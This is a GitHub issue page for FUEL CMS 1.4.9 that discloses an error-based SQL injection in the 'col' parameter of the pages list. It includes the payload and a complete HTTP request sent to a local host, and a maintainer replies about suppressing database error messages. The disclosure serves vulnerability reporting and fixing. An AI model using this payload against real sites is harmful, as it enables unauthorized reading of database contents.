We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Version: 1.4.9
Parameter Name:col Parameter Type: GET Attack Pattern: extractvalue(1,concat(char(126),(select/**/current_user())))
step 1 step 2
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))&fuel_inline=0 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://127.0.0.1/fuel/pages Cookie: ci_session=cfe42220d7540c849f2fdd72ddb732ff0e6addfb; fuel_74d00769f76d3dfc59096d1a4f6419d3=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_74d00769f76d3dfc59096d1a4f6419d3=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%257D
The text was updated successfully, but these errors were encountered:
fix: issue #562
c8d9381
可以具体定位下出问题代码的位置吗?
Sorry, something went wrong.
I've recently pushed an update to prevent DB SQL error messages from being displayed on production which should fix this issue on a production server.
No branches or pull requests
Environment
Version: 1.4.9
Vulnerability
Parameter Name:col
Parameter Type: GET
Attack Pattern: extractvalue(1,concat(char(126),(select/**/current_user())))
Step
step 1
step 2
The text was updated successfully, but these errors were encountered: